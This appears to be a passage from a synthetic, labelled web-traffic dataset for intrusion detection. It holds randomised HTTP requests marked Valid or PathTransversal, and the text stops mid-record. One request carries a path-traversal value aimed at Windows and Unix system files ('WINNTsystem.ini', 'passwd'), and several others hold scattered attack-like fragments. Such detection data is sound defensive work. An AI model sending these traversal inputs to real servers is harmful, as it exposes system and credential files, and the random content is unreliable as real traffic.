Host: www.wt3Nz.ch
Connection: keep-alive
Accept: application/x-tar;q=0.1, image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: max-stale
Client-ip: 103.225.225.209
Cookie: eenRmdntevnnr=tygEbsixan;baice7esah4ia=s;nrdrgIlmte=1299855991
Cookie2: $Version="90"
Date: Thu, 01 Oct 09 15:48:02 UTC
ETag: W/"E7996Ir_-lOnW5UxHXr"
Expect: 100-continue
From: a2jc@3Dx4eae.st
If-Modified-Since: Wed, 11 Feb 04 24:25:58 UTC
If-Unmodified-Since: Fri, 04 Aug 06 24:11:58 UTC
If-Match: "9GnWJjqNOZwI7CDya"
If-None-Match: *
If-Range: *
Max-Forwards: 817
MIME-Version: 0.6
Pragma: eT=eiwTeh
Proxy-Authorization: Digest uri=/0naYTtga/isasndt/dhsaNs/gnre.pl
Authorization: di9m iJo2=fseyces
Range: 1-,-097,-093856
Referer: http://yolv7.st/afsNoe/ihrpCtt/dElwp/7snionne/eC7o.jsp
TE: deflate,trailers
Trailer: Proxy-Authorization
User-Agent: s40IngtTCz http://www.Keoa.biz
UA-CPU: PowerPC
UA-Disp: 460,9204,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 561x3269
Via: 3.6 70.249.173.134, 2.0 www.rSronR.html
Transfer-Encoding: oeta
Upgrade: rtte/6.2, sdt/4.5, rianin/5.6, eelurI/6.7
Warning: 620 28.253.168.33 "eIhu" "Thu, 07 Feb 08 14:55:42 CET"
X-Forwarded-For: 126.157.223.224
X-Serial-Number: 00770838075
----: ---------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 16784
Start - Id: 45430
class: PathTransversal
POST /Six/alPrRKwsLc/7LZft3luscriptWallC6U.tiff? HTTP/1.1
Content-Length: 161
Content-Language: r2teh8,cterSn,clrdQBum
Content-Encoding: deflate
Content-Location: http://www.oabyh.be/itSrHlhe/sshidIat/geyf/nrfrw.doc
Content-MD5: YWlmbGR0c2V2bDdhaEpybg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 27 Oct 04 12:14:36 CET
Last-Modified: Thu, 19 Oct 06 21:17:24 GMT
Host: 248.173.91.83
Connection: ahor
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: uyooo5i-siemt;q=0.6, opeaiOi-8, usu-t8aOo5ns;q=0.0, agvssr-t;q=0.0, iha-o57yim9;q=0.8
Cache-Control: no-store
Client-ip: 102.25.110.183
Cookie: bnaaoUaqt3jne9=nziaun0qtr61;esfnitdiU=07
Cookie2: $Version="494"
Date: Tue, 04 May 10 22:34:23 UTC
ETag: W/"nr8@VlaLMddU-beuo"
Expect: 100-continue
From: d1Subs@Oaeelb.fr
If-Modified-Since: Mon, 05 Apr 10 14:59:57 GMT
If-Unmodified-Since: Sat, 03 Mar 07 15:23:10 GMT
If-Match: "3@TpBQBkFB@3ZsxF"
If-None-Match: "b_EsV_ytGyaG@wdzjv"
If-Range: *
Max-Forwards: 4978
MIME-Version: 4.4
Pragma: ut='tHwo'
Proxy-Authorization: Digest username="aierso"
Authorization: Kbobmp ele8=vlAT2
Range: -292636,082693-
Referer: /o0elL.gif
TE: gzip;q=0.5,deflate,trailers
Trailer: If-None-Match
User-Agent: atpoi (rMVeSM; rxQbrDAaR; apG59d82u; hDrXIZ2O; eYoGEq)
UA-CPU: PowerPC
UA-Disp: 282,5050,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 357x895
Via: HTTP/8.9 245.103.187.32, 4.5 www.Bhea.tiff
Transfer-Encoding: ocene; heml=hermhp
Upgrade: dtOesl/5.5, bnmms/6.9, ehjAL/3.5, hrt/2.4
Warning: 027 www.80Tmnqe.tiff "nrptaalt484raSb7" 
X-Forwarded-For: 88.16.159.203
X-Serial-Number: 6520812020
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

343kmt=34679&nenelurjeirotK=oeccat)uet~havingr77\tn&wHpasswdhM=01861605&0io4fN=..........................WINNTsystem.ini&hr=e<a Epso]wesgroup bytesytrz

End - Id: 45430
Start - Id: 33212
class: Valid
POST /eJ/eptoaaoweunns5ieeo/stZhOIdbyn2olesks9/nIh/e3dnstaa.html? HTTP/1.0
Content-Length: 145
Content-Language: e,eho
Content-Encoding: compress
Content-Location: http://www.wossshs.gov/ugixao4o/UpLp8Res/6caeds.exe
Content-MD5: N3NzZW5hM2Rnb2FlTXJmZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 05 May 06 23:33:16 CET
Last-Modified: Sat, 26 Mar 05 15:56:38 GMT
Host: www.hiekidyt.net
Connection: close
Accept: video/*;q=0.1, video/mpeg;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: tTgeazo-TtbTA, dArUerl-inokrefe;q=0.7
Cache-Control: max-age=92
Client-ip: 204.25.78.12
Cookie: ilotuteaZn8=)iihio/n3fajot)0;tmhhIerrp4e=939970;aN7o=&ig
Cookie2: $Version="95"
Date: Tue, 04 May 10 03:36:37 CET
ETag: W/"kRo5RA1ZFcAu3vbV"
Expect: a25er0aa
From: na2aepi@d4eieegeg.fr
If-Modified-Since: Sun, 04 Dec 05 09:48:31 CET
If-Unmodified-Since: Fri, 04 Apr 08 20:53:18 GMT
If-Match: "A1ihuRfmTTrjtbL"
If-None-Match: "25ecNckVWMPm6uQoiRc"
If-Range: Thu, 20 Mar 08 22:50:25 UTC
Max-Forwards: 51
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic aGFpaWg6ZHdiZGN2ZQ==
Range: 5-,5-93172,41903-8251
Referer: /t1tt6f/clixe.pl
TE: trailers
Trailer: Connection
User-Agent: ooerlde9
UA-CPU: MIPS
UA-Disp: 3198,1175,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 2180x8766
Via: HTTP/9.2 www.gsmyw.htm, 6.1 www.be6auSrs.js:7472, or3os/0.4 www.desEohmo.gif:25
Transfer-Encoding: gzip
Upgrade: neatde/1.7
Warning: 077 www.beaAsoet.png:0598 "ynai" "Tue, 22 Apr 08 08:27:50 GMT"
X-Forwarded-For: 83.167.179.226
X-Serial-Number: 6725811933666552
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tn72ssbT=0338&uvbotsctovw=os&nlooestitheshnh=e6E_&AZ_ifeE=scebbdf4u:&erv2ehjddo=6&iersjhisfn=e-PKjzwY5p&oe56HiAe=7qMP0r r&ehnnxxdluxmv=htctsrSs

End - Id: 33212
Start - Id: 2645
class: Valid
GET /kb8TxmlDPyMCb/hniepoeuiEaef/alur/tGR0f7ZKK09f/si4oi1aenLet/eh6/aUx9L7.tiff? HTTP/1.1
Host: www.crFo1ts.be:80
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: iso-8859-9;q=0.8, cp-950, iso-8859-2;q=0.2, koi8-r;q=0.4, windows-1250
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 183.26.217.193
Cookie: 20dBltI0ohate=xw2ey
Cookie2: $Version="2"
Date: Tue, 26 May 09 08:19:35 CET
ETag: "mF9xaNTdjYBgCEcGVr5_"
Expect: 2esCe2o=tiLw9;ediHnr9
From: dHti@ecsfet3es.de
If-Modified-Since: Fri, 22 Jun 07 09:42:45 GMT
If-Unmodified-Since: Tue, 20 Nov 07 12:14:08 UTC
If-Match: *
If-None-Match: "v15-HACvWWkep_fHB"
If-Range: Tue, 08 Apr 08 21:25:38 GMT
Max-Forwards: 9
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.noelxt.uk/uceliu/partes/cnIjab.mdb
Authorization: Digest nc=8aF95a04
Range: 78017-732
Referer: /riipi.asmx
TE: trailers
Trailer: Accept-Encoding
User-Agent: 3rstl/2.2.7.3.3
UA-CPU: MIPS
UA-Disp: 474,638,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 907x1790
Via: 4.3 219.137.140.90, FTP/9.5 www.zmRes.css, 6.2 196.176.20.164
Transfer-Encoding: identity
Upgrade: YMots/9.9, 2loo/9.6, cgTcde/7.3, ltne1/8.2, mro0ot/2.9
Warning: 065 www.uits5r.png:03 "d0hLuSoewoA4" 
X-Forwarded-For: 196.188.242.124
X-Serial-Number: 8136074594585
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2645
Start - Id: 8527
class: Valid
GET /nu4ivmR63ftpu.Hs/ovXCVzZ0X/DrO0s0iaetseaeof3/il6yT6iMseHPe7oCnzv.asmx?uGtahwlTInxio=otmbeeeetcesanc&dim=allalm5er+u%3A%5Cc&vo360ti=R3melrdtin6entuwii&inuHyboat=tO8HKgh&NsPcuaddfn=87342255&tEuirlDrwoea=lo%7Ciz%3B+&ehhdah8dec0thgm=4Ira HTTP/1.0
Host: 151.7.6.69
Connection: close
Accept: video/quicktime, application/zip;q=0.3
Accept-Charset: *
Accept-Encoding: *
Accept-Language: r-l;q=0.5, eNtn4-fw;q=0.4
Cache-Control: max-age=1089
Client-ip: 19.109.17.170
Cookie: ent=99;rtsaItat=89
Cookie2: $Version="6"
Date: Tue, 24 Jun 08 05:17:22 GMT
ETag: "CG6ji61GJfQuxBqTAla"
Expect: 100-continue
From: laaisi@nHuI4faw.be
If-Modified-Since: Tue, 07 Aug 07 02:10:28 UTC
If-Unmodified-Since: Mon, 27 Nov 06 15:20:34 UTC
If-Match: "7Cju77EbCKx7lUFxLzJ"
If-None-Match: "rEv4sSGoF1t_kO0cTJ"
If-Range: "pTl4E-wTEVK7raRYTKYS"
Max-Forwards: 5584
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: NTLM NTR0RWw4bmhpYmE3YW9zYTJlZXR0dGFyaE14bXJvbkNuaA==
Authorization: Basic cW9oc2l0OjFSaGRs
Range: 288-033,80242-026
Referer: /gni2t/os3tba.wmn
TE: trailers,deflate,chunked;q=0.3
Trailer: Accept
User-Agent: Mozilla/7.1 (X11; U; Solaris 8.5; va-lh; rv:8.6.2) Gecko/36688705
UA-CPU: 68000
UA-Disp: 7723,577,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 108x957
Via: FTP/5.8 www.iAorsNtn.html
Transfer-Encoding: gzip
Upgrade: ctieoL/1.3, oars/8.2
Warning: 328 182.117.115.208 "nRgge7dorgtiielaAlw" "Sat, 18 Aug 07 10:39:09 GMT"
X-Forwarded-For: 249.204.156.98
X-Serial-Number: 642382029635717
----: ----------------
~~~~~: ~~~~~~~~~~

null

End - Id: 8527
Start - Id: 12790
class: Valid
GET /feeJRehntvezcaa/N13lD-Wedhttp/raUpf45tyr/hlrEkbsieAiwci/rfhbQ.fmQpN/mxo/h3P0vwfvOZYHEY56/mratirarqnoe3sl/bCv5M26o/owutq.nsf? HTTP/1.0
Host: www.ltsea.com
Connection: ot3jcn
Accept: image/jpeg;q=0.6, text/*;q=0.3
Accept-Charset: *
Accept-Encoding: compress;q=0.5, identity;q=0.9, gzip;q=0.5, compress;q=0.5
Accept-Language: thl-sNeu, dlsr-FuaeY;q=0.1, se-Ovat;q=0.3, e-e;q=0.0, jsrJ-dn8g;q=0.5
Cache-Control: max-age=6332
Client-ip: 152.134.10.228
Cookie: hc1rlAc68o4e=550wHw__pUWg
Cookie2: $Version="56"
Date: Mon, 28 Feb 05 09:56:26 CET
ETag: W/"-7ONrxJoUu6DEHErHf4"
Expect: 100-continue
From: xrsuatgk@senspp.biz
If-Modified-Since: Thu, 29 Mar 07 12:59:22 UTC
If-Unmodified-Since: Thu, 16 Mar 06 23:20:11 UTC
If-Match: "eNLKYMlI4QBiG2xs"
If-None-Match: "r9QlmiZZixGO@ga2"
If-Range: "mlR@Bv@5@kFMhWM"
Max-Forwards: 38
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: Digest nc=FbFC07b3
Authorization: Digest uri=/Drsta.dll
Range: 880687-,10-
Referer: http://oahe.cz/mhor/NNcCi/vteep/taNTe/474ns.pdf
TE: trailers
Trailer: Accept-Charset
User-Agent: iIi5jw
UA-CPU: MIPS
UA-Disp: 718,169,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 3357x7611
Via: 4.1 www.dBymlA.css, plco/7.0 180.159.79.194:51
Transfer-Encoding: stao; 0ieus9m=l9a7e
Upgrade: DoR/2.1, rahogo/2.6
Warning: 738 www.mdRbith.jpeg "5erngdnraionsLeaa6n" 
X-Forwarded-For: 192.196.28.56
X-Serial-Number: 3346071128
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12790
Start - Id: 14519
class: Valid
GET /mCnXFc-KAyE2F/3TP0a0yvOU.tiff? HTTP/1.0
Host: www.eaynaoastE.st:622
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-turkish;q=0.0
Accept-Encoding: identity;q=0.9, identity, deflate, identity;q=0.7, identity
Accept-Language: st-tnady;q=0.2
Cache-Control: max-age=101
Client-ip: 119.245.171.52
Cookie: hecsieosiall=41673
Cookie2: $Version="80"
Date: Mon, 22 May 06 23:51:23 GMT
ETag: "rRmqwhf@rbp5lVhHR"
Expect: 100-continue
From: ateo@totu.fr
If-Modified-Since: Tue, 20 Feb 07 08:59:10 UTC
If-Unmodified-Since: Wed, 21 Jan 09 17:17:17 GMT
If-Match: *
If-None-Match: "G_j74Q.2qs7Cyq1307"
If-Range: Thu, 03 Mar 05 17:44:16 UTC
Max-Forwards: 5
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: hyla8 cehe=cegetee
Range: 4019-22,-23,269-5
Referer: http://ieos.gov/zyustA/dloe/islhdfkn.mspx
TE: trailers,trailers,gzip
Trailer: Cache-Control
User-Agent: Mozilla/4.6 (Windows; U; Win98 8.4; zh-oy; rv:0.0.6) Gecko/83278172
UA-CPU: x86
UA-Disp: 866,9515,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 3486x145
Via: 4.5 www.jotntShl.htm:72908, 6.4 194.66.15.179:5
Transfer-Encoding: deflate
Upgrade: deoC/9.0, lnte1/6.7
Warning: 286 www.onba2h.tiff "okewrt0tac" "Sun, 08 May 05 11:09:41 GMT"
X-Forwarded-For: 129.8.69.87
X-Serial-Number: 01337
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14519
Start - Id: 11101
class: Valid
GET /giuyQ6odicta.shtml?6ater5iato=eo%5DEiOe&arusfwcpinlyl3E=d&dhgcrymNxd=bin9rsetc HTTP/1.1
Host: 26.80.0.221
Connection: tbok
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 115.14.154.14
Cookie: katcl=a;s0tf1RealS7=xodggonRxuehTineet;hai=oshto;mejE=1388
Cookie2: $Version="29"
Date: Wed, 04 May 05 06:46:51 GMT
ETag: "2H7HIvjv993.E_Kr"
Expect: 100-continue
From: ya1diga@ehabgpa.fr
If-Modified-Since: Wed, 06 Jun 07 06:54:00 GMT
If-Unmodified-Since: Sun, 22 Apr 07 05:04:24 GMT
If-Match: "CmX7KjKdW8DSc_B9ej"
If-None-Match: *
If-Range: *
Max-Forwards: 911
MIME-Version: 1.7
Pragma: rrhuaaws=o
Proxy-Authorization: Basic dXdhbnRlOmlzb28x
Authorization: Digest realm
Range: 3-154394,2-
Referer: http://www.vOc3lI.uk/oyatt1eO.htm
TE: trailers,trailers,trailers
Trailer: From
User-Agent: Mozilla/0.0 (Machintosh; U; PPC 3.5; mY-zd; rv:6.2.6) Gecko/82051647
UA-CPU: 68000
UA-Disp: 8798,283,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 4624x463
Via: 8.5 www.nyd9xnnl.shtml, 4.4 228.43.230.109, 4.2 www.8et6aTan.jpg:45
Transfer-Encoding: deflate
Upgrade: 9Peael/7.0, 5bla/6.8, cEa/8.0
Warning: 890 225.36.216.127 "thcgttar0olaoaknweu" 
X-Forwarded-For: 199.237.53.206
X-Serial-Number: 96723
----: ------------
~~~~~: ~~~~~~~~~~

null

End - Id: 11101
Start - Id: 6773
class: Valid
POST /eacioooe/Vn.gwvo3tPIv_q/eyx/hnogoqbh1ReAe8rO/wisn3hR/g4pD1H5/5cis/5FyCnak7eSraT/sG.exe? HTTP/1.0
Content-Length: 71
Content-Language: t
Content-Encoding: gzip
Content-Location: http://cvnhehne.it/encYDre/bsiiHN/tsqtrhPn.conf
Content-MD5: YXNoc2VVaHRlY2V5b3R0aQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 05 Jan 09 07:20:09 CET
Last-Modified: Thu, 30 Nov 06 15:26:13 UTC
Host: www.tmowePb1.st
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: iso-8859-1, x-mac-chinesesimp;q=0.1, ks_c_5601-1987;q=0.0
Accept-Encoding: compress;q=0.4, identity;q=0.8, identity, deflate, compress
Accept-Language: anr6-rA, rtd-parE, rr-cldasfre, 4egI2yoa-sjoujpLs
Cache-Control: no-transform
Client-ip: 93.236.222.131
Cookie: uEsrer=559605;ltghftimevd6s9=2;hteuht=yperlaft>ivarhometmp
Cookie2: $Version="75"
Date: Sun, 31 May 09 14:33:04 GMT
ETag: "qXmOYNfiyjf3O5R"
Expect: 100-continue
From: hgrgi@twaau.be
If-Modified-Since: Tue, 04 Mar 08 05:49:14 UTC
If-Unmodified-Since: Wed, 08 Jun 05 12:36:01 GMT
If-Match: "4o280w0v0TQE6dleN"
If-None-Match: *
If-Range: Fri, 19 Aug 05 24:45:30 UTC
Max-Forwards: 2
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Digest username="dZssynoF"
Authorization: Basic ZG90Y2k6ZTJ0aA==
Range: -53,50110-4206
Referer: /hiv05tte.sh
TE: gzip;q=0.7,chunked;q=0.6,chunked;q=0.0
Trailer: Range
User-Agent: Mozilla/1.8 (Windows; U; Windows NT 5.9; io-8e; rv:8.1.7) Gecko/81436097
UA-CPU: StrongARM
UA-Disp: 610,0382,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 3268x616
Via: 8.9 18.134.7.38:8
Transfer-Encoding: gzip
Upgrade: wetlti/0.9, ndo/4.0, Ralc/5.4, 4tt/7.6, ogib0/1.3
Warning: 686 27.211.29.45 "sijrpot" "Sat, 10 Jun 06 10:21:01 UTC"
X-Forwarded-For: 191.106.203.155
X-Serial-Number: 830725
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

mnQM_9P=0&arolTS=42&soiatmiEAfiec=737&eVtexuidarLocZ=72&W6X3SEyHSkZd=29

End - Id: 6773
Start - Id: 21588
class: Valid
GET /azM0eiwelretomnIs/1eh.jpg?cqe5hhotraty=652&owlu=goop%24&tpamkxduEx=e1zt&2GegWe6PTZwget=26 HTTP/1.1
Host: www.llkr.fr
Connection: close
Accept: video/quicktime;q=0.9, audio/*
Accept-Charset: x-mac-arabic
Accept-Encoding: deflate, deflate, compress;q=0.9, compress
Accept-Language: rsdi1i-kisjilh;q=0.8, isn-ei9;q=0.6, 2o-ho, nowszyzi-RxrdOzah;q=0.0
Cache-Control: max-stale
Client-ip: 14.192.39.170
Cookie: ojnte3smhoisa=hAp56mrTet9cytmiHl;mre=gatpsi
Cookie2: $Version="86"
Date: Wed, 27 Apr 05 11:37:00 UTC
ETag: W/"OMZwIs6Bxvpqs61r"
Expect: eIxaen4e=2auh;bWPne7g
From: octEhy@eenoS.org
If-Modified-Since: Wed, 17 Feb 10 08:55:31 UTC
If-Unmodified-Since: Tue, 14 Aug 07 11:10:50 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 38
MIME-Version: 2.8
Pragma: l='saiO'
Proxy-Authorization: Digest nc=69Fc9563
Authorization: Digest algorithm=MD5
Range: 2-,639-89,039-12407
Referer: http://7tfd.org/aamrn1ap/ttlt/ch1icy/sifrblth.dll
TE: trailers,deflate,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/4.2 (compatible; eanerao; Unix; ofqeybLa; Fesh; lobr0bsaBE)
UA-CPU: x86
UA-Disp: 198,1596,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1645x752
Via: htnho/9.2 www.9eys.tiff:4, HTTP/3.7 100.23.86.16:98479
Transfer-Encoding: gzip
Upgrade: blnen/8.7
Warning: 454 253.133.69.76 "ooerIseMeAi7r9coias" "Sat, 14 Oct 06 08:48:24 UTC"
X-Forwarded-For: 99.21.116.3
X-Serial-Number: 0418048557333038
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21588
Start - Id: 33064
class: Valid
POST /eegjdoHteeasj.gif? HTTP/1.1
Content-Length: 246
Content-Language: ntipse,hbb,pEDs
Content-Encoding: gzip
Content-Location: /8evzsh.bin
Content-MD5: NnR5eGROc2hvb2ltOHdvbg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 19 Mar 05 13:49:43 UTC
Last-Modified: Wed, 07 Feb 07 07:18:14 UTC
Host: 3.227.135.99
Connection: keep-alive
Accept: application/*, text/*, audio/*;q=0.0
Accept-Charset: x-mac-chinesesimp, macintosh, cp-950;q=0.9, x-mac-greek
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 207.239.107.53
Cookie: echoSltelneta=>;og=6906066
Cookie2: $Version="88"
Date: Tue, 25 Mar 08 22:42:42 UTC
ETag: W/"gqIWxsvwAx.L8aUb"
Expect: nbOgee
From: sowsRo@erhAjxir.gov
If-Modified-Since: Fri, 23 May 08 01:57:09 UTC
If-Unmodified-Since: Thu, 17 Aug 06 05:39:05 CET
If-Match: "MjdE9C8@XjXQRUQyhYRf"
If-None-Match: *
If-Range: Thu, 24 Aug 06 12:50:18 UTC
Max-Forwards: 3546
MIME-Version: 3.9
Pragma: tk='8nemr1e'
Proxy-Authorization: NTLM NGlsZm91dDJhaUVhcFdpTGVlYWt0dXQycnlvb29kaVRuYnR6N3Ruc29jNzJ6c3Np
Authorization: NTLM ZnJ0a2VlNW9YMm5yaVRjck9UcnYyd2FudHVuaHllR25pOG9lbXRjd28=
Range: -93272,-25391
Referer: /Se4dere/tmget.cgi
TE: gzip,gzip
Trailer: If-None-Match
User-Agent: AraTs (aTDTuJrq3j; mj2mfR; amx5hh8Rh)
UA-CPU: MIPS
UA-Disp: 287,078,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 3468x969
Via: ignr/7.6 www.taao.jpg
Transfer-Encoding: deflate
Upgrade: NbO/9.5, tosea/6.2, stots/4.0, if3/9.5
Warning: 736 247.169.30.239 "bera18znowhiawCntoth" 
X-Forwarded-For: 205.136.153.13
X-Serial-Number: 71160
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

iTttiruiscsh=41940779&aw9urhly1elznse=iYfiunmD&16n6e=b opene&Gsediyz66eIs=ndeuOepi&asce=ras&tawhdoCsti8=yM3_uwo2B&nleetrutue=i5mpaibbetweenes&tlwrcldhudie=loth&opi6usrzpnsSytd=7g:&telet6a=lSd&4hatll=catlnrtl&h4vose9=ctwGmgou&ccA8M=sock_streamJa

End - Id: 33064
Start - Id: 24798
class: Valid
GET /aP4nQdgEZuRnSY2hmAO/chtndhnpi3tatX/rHKsY/nEePPa/sGUdA_lVs6/ihBsukXDrW/d_7yjkmRL./7t3/ep3fDYsh3NL/HmIaMVDubXeDU/hmiioama.css? HTTP/1.0
Host: 213.236.115.93:87
Connection: keep-alive
Accept: image/png
Accept-Charset: x-mac-greek, euc-kr;q=0.8, shift_jis;q=0.7
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: min-fresh=331
Client-ip: 8.124.197.142
Cookie: YJSx2TY9v=78959;pbirtkebd0rt=ER;sta=sR4t;rHqPSlsN1nr=bini3zscriptssXs;VQdGXrJqz=irl;rfethl96xkoea=snjs8vba
Cookie2: $Version="585"
Date: Sun, 20 May 07 20:35:21 UTC
ETag: W/"3M.kholm9_fIPRMrv"
Expect: ecewDri1=Tnveeo
From: iesi0goR@Pnih.ch
If-Modified-Since: Wed, 25 Jun 08 17:05:13 CET
If-Unmodified-Since: Tue, 11 Jan 05 18:56:35 GMT
If-Match: "ABkYj1CMJ5kXF29-Ax4"
If-None-Match: "-jaU2UPRvuAmWNs"
If-Range: *
Max-Forwards: 19
MIME-Version: 8.0
Pragma: rpeholN='oeymi9'
Proxy-Authorization: Nixaoe ihecer=0gNx
Authorization: NTLM c3RvM2RjZHp5dXROZWh5Y1NvTWxzZWRhYmFlbnBvb2xoSWR5MG9nZXNleG5PYw==
Range: -5,-50,2-85387
Referer: http://dednpmh.be/taIeg/fssw/o1sEah.txt
TE: trailers,trailers,deflate;q=0.0
Trailer: Via
User-Agent: mmrdla (al2eZO5uxV; epck6g_c; jMicNeg; gHfcpkn8)
UA-CPU: x86
UA-Disp: 1309,0345,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 3792x2228
Via: HTTP/0.4 www.odthn.jpg, FTP/0.0 www.qterr.htm
Transfer-Encoding: deflate
Upgrade: hth/9.0, mu3eiy/7.6, tfet8s/2.8, lWeo9d/7.8, oud/9.2
Warning: 846 www.iaYhgar.htm "faTiuonea8seod" 
X-Forwarded-For: 21.89.90.200
X-Serial-Number: 56718
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24798
Start - Id: 14618
class: Valid
GET /zcgt/nNYwLAbCk54F33CH.asp?asoinlsenn=cKeGjOR&cdeokDzpn=+t&ogusoelnAte=ehmsgldptiaohn&8ueik=121996384&qoSrTsllesssr=c0&etlerbqtaadrt=00490 HTTP/1.0
Host: www.nsnGpn.org:52
Connection: smwlgwoy
Accept: application/zip, video/quicktime
Accept-Charset: cp-950, euc-jp;q=0.9, windows-1254;q=0.5, iso-8859-5, windows-1251
Accept-Encoding: *;q=0.5
Accept-Language: eEg-ntTito, ssrmhy-scGiot;q=0.8, oQeiy-Itl, yeaU-cent;q=0.3
Cache-Control: no-store
Client-ip: 238.75.53.47
Cookie: fepd=glr
Cookie2: $Version="4"
Date: Sat, 16 Sep 06 02:07:17 UTC
ETag: W/"MfTmS8QQQ3HKD1@"
Expect: sshqti
From: uneUynt@llT9mrd0ie.uk
If-Modified-Since: Sun, 22 Jun 08 08:06:23 GMT
If-Unmodified-Since: Thu, 06 Mar 08 14:14:48 UTC
If-Match: *
If-None-Match: "NpUcGqjOHZukM70umpx"
If-Range: *
Max-Forwards: 13
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: Basic QWVlOGFzRTpENm9lb3p0
Authorization: 2u4i o1fLrr=eaabca
Range: 1300-923,-76,037830-31
Referer: http://Lttoi.net/iltwnf/CwsxeHfo.php4
TE: gzip
Trailer: Authorization
User-Agent: hr7rg7rmdy/3.5.7
UA-CPU: PowerPC
UA-Disp: 1652,237,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 093x0174
Via: 3.0 121.46.100.43, 6.4 94.235.57.250:05, FTP/9.4 218.133.241.150
Transfer-Encoding: p9wih; hbNsh8D=rg4wEanB
Upgrade: ety/4.8
Warning: 533 www.h8lse.jpeg "1t1horto" 
X-Forwarded-For: 214.165.29.201
X-Serial-Number: 28910349808
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14618
Start - Id: 16768
class: Valid
GET /hf1ho2/7birn4insaeiaeytnd/hzUv0-sNuc/mMJ/yWlPKbHRnj.b./heozdmFyuXqEfPFd5ua/ccaded3/fLe4dhQlxcs44U/6az5eaaluehseathsh/sHMO0w@9Nqyn.sh?MWqXoTwinntqL=bob&we=976171 HTTP/1.0
Host: www.7g9cnlt.st
Connection: eene
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, compress
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 101.13.96.212
Cookie: yoex=I';Dt6n=e;scsieiAtisoq=597;59n5oatf=rIIe s
Cookie2: $Version="8"
Date: Mon, 20 Nov 06 15:50:07 CET
ETag: "J-jyQUJFX5X5GVI"
Expect: 100-continue
From: tAgim@uoet.gov
If-Modified-Since: Fri, 27 Apr 07 11:51:42 UTC
If-Unmodified-Since: Thu, 25 Jun 09 15:45:22 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 14 Oct 07 21:50:27 UTC
Max-Forwards: 099
MIME-Version: 0.6
Pragma: t='mcatE'
Proxy-Authorization: NTLM YWF3ZUVudHVkc0JvaGVodHN5d2V5OHNhcm9iZWVzbGE=
Authorization: NTLM dGJ3emFlc29lY29sdXN0VFJod2lhYXF1cHdFdHd5ZXM3dnVvc2RxZQ==
Range: 73855-,-7357
Referer: http://4yhrhls.net/tOaet4/sqkr/Hnsreyl.nsf
TE: trailers,chunked;q=0.7
Trailer: Accept-Encoding
User-Agent: Mozilla/3.5 (Machintosh; U; PPC Mac OS X 5.7; li-Ne; rv:7.7.3) Gecko/34593670
UA-CPU: PowerPC
UA-Disp: 9450,977,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 8734x738
Via: 3.8 220.106.111.153, 4.4 www.tstOtoaL.jpeg:98486
Transfer-Encoding: deflate
Upgrade: werr/0.1, nehc/6.8, ief/7.3, dsoe/2.7, mmnl2e/1.6
